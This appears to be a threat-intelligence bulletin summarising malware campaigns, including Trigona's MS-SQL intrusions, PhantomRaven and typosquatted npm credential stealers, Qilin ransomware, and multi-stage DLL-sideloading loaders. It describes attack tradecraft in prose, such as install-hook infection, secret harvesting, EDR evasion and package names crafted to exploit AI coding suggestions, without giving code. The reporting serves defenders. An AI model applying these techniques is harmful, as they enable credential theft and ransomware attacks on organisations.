Threat Alerts

The Trigona ransomware group continues targeting Microsoft SQL servers through brute-force attacks, now deploying advanced Rust-based scanners and remote access tools. These attacks exploit weak credentials and exposed database servers to establish persistent access and deploy ransomware payloads.

The attack chain begins with reconnaissance commands to gather system information, followed by exploitation of the Bulk Copy Program (BCP) utility to store and reconstruct malware within SQL tables before exporting as executable files. Attackers use various download methods including curl, Bitsadmin, and PowerShell to retrieve additional payloads from command-and-control servers. The group maintains persistence through multiple remote access tools including AnyDesk, RDP connections, and the Teramind monitoring platform, creating administrative accounts with names like “Remote99” and “Ladmin” to facilitate ongoing access.

Recent campaigns feature new Rust-written scanner malware that identifies vulnerable RDP and MS-SQL endpoints across the internet, sending system information to command servers before executing scanning operations. The threat actors deploy custom stress-testing tools written in Go that perform SQL injection and HTTP flood testing for network reconnaissance. Additional utilities disable Windows Defender, delete forensic traces, and replace legitimate system executables with malicious versions. The consistent use of specific table names and format files across multiple campaigns demonstrates the group’s operational continuity and systematic approach to database server compromise.

A sophisticated malware campaign identified as PhantomRaven has been active since August 2025, deploying 126 malicious npm packages that have collectively reached over 86,000 downloads. The campaign specifically targets software developers and CI/CD pipelines, harvesting npm authentication tokens, GitHub credentials, and build environment secrets while using advanced evasion techniques.

PhantomRaven leverages a novel technique known as Remote Dynamic Dependencies (RDD) to conceal malicious code from security scanners. Instead of embedding malicious payloads directly within npm packages, the malware retrieves hidden dependencies from attacker-controlled URLs at install time—bypassing npm’s dependency checks and appearing harmless to automated tools. When developers execute npm install, lifecycle scripts such as preinstall, install, and postinstall hooks run automatically, enabling silent infection without user interaction.

Once installed, the malware scans the development environment for sensitive information, including .gitconfig, .npmrc, GitHub Actions tokens, GitLab CI, Jenkins, and CircleCI credentials. It exfiltrates data via multiple redundant channels—HTTP GET and POST requests, and fallback WebSocket connections—to ensure delivery even in restricted environments. The campaign’s operators employ carefully crafted package names designed to exploit LLM-generated coding suggestions from tools like GitHub Copilot or ChatGPT, making this one of the most adaptive and socially engineered npm-based threats observed to date.

Qilin remains one of 2025’s most active and damaging ransomware operations, publishing more than 40 victims per month and frequently peaking at ~100 postings during high activity months. Recent cases show a clear focus on manufacturing, professional and scientific services, and wholesale trade across the United States, Canada, the UK, France and Germany. Investigations reveal attackers frequently gain network footholds via compromised VPN or exposed administrative credentials, then move with RDP and domain-level reconnaissance to enumerate controllers, users and privileges. Once inside, the actors collect credentials with a suite of credential harvesters and custom scripts, consolidate results, and exfiltrate sensitive data using legitimate tools and cloud-transfer utilities to obscure traffic. Artifact traces also point to the use of common system tools for manual review of stolen files and, in some scripts, character encodings that hint at an Eastern European or Russian-speaking origin.

Operationally, Qilin commonly runs two complementary encryptors: one that spreads across hosts (often via remote execution tooling) and another that runs from a single system to rapidly encrypt network shares and cluster storage. The intrusions show layered defensive evasion — obfuscated PowerShell, AMSI/TLS bypasses, attempts to disable EDR, and anti-forensics such as deleting Windows event logs and clearing shadow copies — followed by destructive actions that inhibit recovery. Post-execution persistence uses scheduled tasks and RUNkey entries while ransom notes and dedicated leak sites pressure victims with data exposure.

A sophisticated supply-chain attack on the npm ecosystem exposed developers to a multi-stage credential-theft operation through 10 malicious packages disguised as legitimate developer tools. Remaining active for over four months and accumulating nearly 10,000 downloads, the campaign used typosquatting to publish fake versions of widely used libraries (TypeScript, discord.js, ethers.js, react-router-dom, etc.), compromising developer environments across Windows, macOS, and Linux. Infection begins when developers install the typosquatted packages: malicious postinstall scripts run immediately, detect the OS, and launch heavily obfuscated payloads in new terminal windows to evade detection. The malware uses four layers of obfuscation self-decoding wrappers, dynamic XOR encryption, URL encoding, and mixed-base control-flow obfuscation and presents a convincing fake CAPTCHA that requests interaction while silently sending the victim’s IP to an attacker-controlled server for profiling and filtering.

After the fake CAPTCHA, the campaign downloads a 24 MB PyInstaller binary tailored to the victim’s platform; this information-stealer harvests credentials from system keyrings, web browsers, and cloud/DevOps tooling (AWS credentials, Kubernetes configs, Docker settings, Git credentials), including session cookies that can bypass multi-factor authentication and enable prolonged cloud impersonation. Harvested data is compressed into ZIP archives stored in temporary directories and exfiltrated to attacker infrastructure. The modular, multi-stage design immediate postinstall execution, platform-specific binaries, layered obfuscation, fingerprinting via IP profiling, and efficient packaging/exfiltration — maximizes theft while minimizing detection, illustrating the growing sophistication of supply-chain threats to developer ecosystems.

A sophisticated malware loader discovered in May 2025 represents a significant threat to system security through its ability to deploy multiple malware families simultaneously. The loader demonstrates advanced evasion techniques and establishes deep persistence mechanisms on infected systems, enabling attackers to maintain long-term access and control over compromised machines. Its use of previously unseen API hashing methods and multi-stage infection process makes detection and remediation particularly challenging.
The infection begins when victims encounter a ZIP file containing hidden system files alongside a single visible legitimate executable. When executed, this file triggers a DLL sideloading attack that loads a malicious library, which subsequently injects two distinct malware loaders into separate processes. The loader employs API hashing through the MurmurHash2 algorithm for dynamic function resolution, a technique that complicates analysis and detection efforts. Payloads are protected using AES-128-ECB encryption and LZMA compression, requiring decryption and decompression before execution. The malware creates a suspended process and injects its payloads into virtual memory, while establishing persistence through registry modifications and file placement in the local application data directory to ensure automatic execution at system startup.

The two deployed malware families serve complementary purposes in the attack chain. The first payload functions as a downloader that communicates with remote infrastructure through the TOR network, enabling anonymous command-and-control operations. The second payload is a commercial remote access tool that grants attackers direct control over infected systems. Both components utilize Protocol Buffers for data serialization and maintain their own persistence mechanisms.

A sophisticated campaign targeting professionals uses fake job recruitment lures to deliver a new malware family, DreamLoader, which employs modular deployment frameworks for flexible, persistent operations. Initial delivery comes as password-protected ZIP archives containing trojanized legitimate software; when executed, multiple loader variants are installed via DLL sideloading that abuse trusted Windows binaries and legitimate system processes to evade detection. The loaders create registry keys and trigger secondary payloads that perform credential theft and reconnaissance, and they deploy Base64 encoded, encrypted payloads which decrypt into additional components that authenticate to Microsoft services using embedded access tokens and communicate with compromised SharePoint instances through the Microsoft Graph API.

The most complex component functions as a malicious service that keeps encrypted payload files separate from the main loader and chains recursive decryption/loading steps—each layer unpacking the next making analysis and detection markedly harder. This modular, multi-stage architecture enables operators to push different payloads as needed (with evidence of identical payloads across multiple hosts), combining targeted social-engineering with technical sophistication to maintain stealth, persistence, and resilient command-and-control using Microsoft infrastructure.